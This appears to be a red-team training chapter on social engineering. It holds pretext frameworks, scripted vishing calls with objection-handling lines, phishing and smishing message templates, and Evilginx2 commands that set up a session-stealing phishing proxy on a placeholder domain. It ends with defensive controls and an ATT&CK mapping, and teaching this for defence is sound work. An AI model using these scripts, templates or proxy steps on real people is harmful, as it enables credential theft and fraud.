NEW CHAPTER

Social Engineering: Hacking Humans

The art of manipulating people to bypass security controls

The Human Factor

Technical controls keep improving. Firewalls, EDR, MFA—all getting better. But humans? We're still running the same vulnerable wetware we had 10,000 years ago. Social engineering exploits trust, authority, urgency, and helpfulness. Intelligence gathered via OSINT makes these attacks devastatingly effective.

Psychological Principles

All social engineering exploits predictable human psychology. Robert Cialdini's principles of influence are the foundation:

┌─────────────────────────────────────────────────────────────────────────────┐
│                    CIALDINI'S PRINCIPLES OF INFLUENCE                        │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                             │
│  AUTHORITY                              URGENCY/SCARCITY                    │
│  ══════════                             ════════════════                    │
│  "IT Security Team requires..."         "Your account will be locked       │
│  "CEO has requested..."                  in 24 hours unless..."            │
│  People obey authority figures          Fear of missing out drives action  │
│                                                                             │
│  SOCIAL PROOF                           RECIPROCITY                         │
│  ════════════                           ═══════════                         │
│  "Everyone in your department           "I helped you last week,            │
│   has already completed..."              now I need a small favor..."      │
│  We follow what others do               We feel obligated to return favors │
│                                                                             │
│  LIKING                                 COMMITMENT/CONSISTENCY              │
│  ══════                                 ══════════════════════              │
│  Build rapport before the ask           "You said you'd help..."            │
│  Mirror speech patterns, find           Once we commit, we follow through  │
│  common ground                          Start small, escalate              │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘

Pretexting: The Art of the Story

A pretext is the story you tell—who you are, why you're calling, why your request is legitimate. Good pretexts are researched, rehearsed, and realistic.

Building Effective Pretexts

PRETEXT DEVELOPMENT FRAMEWORK:

1. ROLE SELECTION
   WHO are you pretending to be?
   • Internal: IT support, HR, executive assistant, new employee
   • External: Vendor, auditor, delivery person, utility worker
   • Choose role that explains your access request

2. BACKGROUND RESEARCH
   Make your story bulletproof with OSINT:
   • Real department names, manager names
   • Recent company events (merger, office move, audit)
   • Technology they use (Office 365, Salesforce, etc.)
   • Jargon and acronyms specific to company

3. MOTIVATION
   WHY are you making this request?
   • Deadline pressure: "Report due to board tomorrow"
   • Problem-solving: "Trying to fix issue before boss notices"
   • Routine task: "Annual compliance check"

4. AUTHORITY CHAIN
   Who sent you? Who can verify?
   • Name-drop real executives (from LinkedIn)
   • Reference real projects or initiatives
   • Create sense of escalation path

5. OBJECTION HANDLING
   Anticipate pushback:
   • "Let me verify with IT" → "John Smith approved it"
   • "I need to check policy" → "Time-sensitive, can we expedite?"
   • "Can you email instead?" → "System issues, that's why I'm calling"

Common Pretext Scenarios

IT Support

"Hi, this is Mike from IT. We're seeing some unusual activity on your account..."

HR / Benefits

"This is Sarah from HR. There's an issue with your direct deposit that needs immediate attention..."

Executive Assistant

"I'm calling on behalf of [CEO name]. He needs access to [system] for an urgent board meeting..."

Vendor Support

"This is Microsoft support. We've detected malware on your system and need remote access to fix it..."

Phishing: Digital Deception

Phishing remains the most common initial access vector. Success depends on convincing targets to click, download, or enter credentials.

Phishing Email Anatomy

EFFECTIVE PHISHING EMAIL COMPONENTS:

FROM: spoofed-sender@legitimatelooking.com
      ├── Display name matches expected sender
      ├── Domain looks legitimate (typosquatting)
      └── SPF/DKIM may fail if not properly spoofed

SUBJECT: Creates urgency or curiosity
      ├── "Urgent: Your account will be suspended"
      ├── "Action Required: Verify your information"
      ├── "You have (1) new document to review"
      └── "[Company] Password Reset Request"

BODY:
      ├── Professional appearance (logos, formatting)
      ├── Urgency language ("immediately", "within 24 hours")
      ├── Fear trigger ("security breach", "unauthorized access")
      ├── Authority reference (CEO, IT, HR)
      ├── Minimal grammar/spelling errors
      └── Call to action (click link, open attachment)

LINK/PAYLOAD:
      ├── Credential harvesting page (fake login)
      ├── Malicious attachment (macro-enabled doc)
      ├── Drive-by download page
      └── OAuth consent phishing

Credential Harvesting Pages

Fake login pages that capture credentials. Tools like Evilginx2 and Modlishka act as reverse proxies, capturing credentials AND session tokens in real-time, defeating most MFA implementations.

Evilginx2 - MFA Bypass Proxy

# Evilginx2 sits between victim and real site
# Captures credentials AND session cookies in real-time

: phishlets hostname microsoft365 login.evilphish.com
: phishlets enable microsoft365
: lures create microsoft365
: lures get-url 0

# Victim visits: https://login.evilphish.com/xyz
# Sees real Microsoft login (proxied)
# Enters credentials + MFA code
# Evilginx captures session token
# Attacker now has valid authenticated session

MFA is Not Enough

Reverse proxy phishing defeats traditional MFA. The attacker captures the authenticated session token after the user completes MFA. Only phishing-resistant MFA (FIDO2/WebAuthn hardware keys) stops this attack.

Vishing: Voice Phishing

Phone-based social engineering. Often more effective than email because real-time conversation builds trust and creates urgency.

VISHING CALL STRUCTURE:

OPENING (Build Rapport):
├── Friendly, professional tone
├── Reference internal knowledge (names, projects)
├── Establish legitimacy quickly
└── "Hi, this is [Name] from [Department]..."

PROBLEM STATEMENT (Create Urgency):
├── Present a problem that needs immediate action
├── Use fear: "security issue", "compliance violation"
├── Time pressure: "before end of day", "CEO is waiting"
└── "We've detected some unusual activity..."

THE ASK (Get What You Need):
├── Start small (verify information)
├── Escalate gradually (reset password, grant access)
├── Make it easy to say yes
└── "I just need to verify a few things..."

HANDLE OBJECTIONS:
├── "Let me check with my manager" → "This is time-sensitive"
├── "Can you send an email?" → "Systems are down, that's why I'm calling"
├── "What's your employee ID?" → Have one ready from OSINT
└── Always have a fallback story

CLOSE (Exit Gracefully):
├── Thank them for their help
├── Confirm action was taken
├── Leave no suspicion
└── "Thanks so much, you've been very helpful"

Caller ID Spoofing

VoIP services allow attackers to display any caller ID. The call appears to come from the company's main number or IT helpdesk.

Smishing: SMS Phishing

Text message phishing exploits the trust people place in SMS and the limited screen space that hides suspicious URLs.

COMMON SMISHING TEMPLATES:

DELIVERY NOTIFICATION:
"Your package could not be delivered.
Reschedule here: bit.ly/xyz123"

BANK ALERT:
"[Bank]: Unusual activity detected on your account.
Verify immediately: secure-verify.com/bank"

MFA CODE REQUEST:
"Your verification code is 847291.
If you didn't request this, secure your account: acct-secure.co"

CORPORATE:
"[Company] IT: Your VPN certificate expires today.
Renew now to avoid disruption: vpn-renew.co/corp"

Physical Social Engineering

In-person techniques covered in detail in Physical Red Team. Key approaches include:

Tailgating

Following authorized person through secured door. "Hands full" technique works well.

Impersonation

Vendor, IT support, delivery person. Uniform + clipboard = access.

USB Drops

Leave infected USB drives in parking lots. 45-98% get plugged in.

Dumpster Diving

Organizational intel from trash. Org charts, passwords on sticky notes.

Detection & Defense

Defensive Measures

Technical controls help but human awareness is the primary defense against social engineering. Training should be continuous, not annual.

SOCIAL ENGINEERING DEFENSES:

TECHNICAL CONTROLS:
├── Email filtering (SPF, DKIM, DMARC)
├── URL reputation checking
├── Attachment sandboxing
├── Phishing-resistant MFA (FIDO2/WebAuthn)
├── Caller ID validation (STIR/SHAKEN)
└── SMS link warnings

PROCESS CONTROLS:
├── Verification callbacks for sensitive requests
├── Out-of-band confirmation for wire transfers
├── No credential sharing over phone/email policy
├── Visitor management systems
└── Clean desk policy

HUMAN CONTROLS:
├── Security awareness training
├── Simulated phishing exercises
├── Report suspicious activity culture
├── Verify unexpected requests
└── "Trust but verify" mindset

DETECTION:
├── User-reported phishing (make it easy!)
├── Email header analysis
├── Link click tracking
├── Login anomaly detection
└── Voice call pattern analysis

MITRE ATT&CK Mapping

T1566.001

Spearphishing Attachment - Malicious files via email

T1566.002

Spearphishing Link - Malicious links to credential harvesting

T1598.001

Spearphishing Service - Using third-party services

T1598.003

Spearphishing Voice - Vishing attacks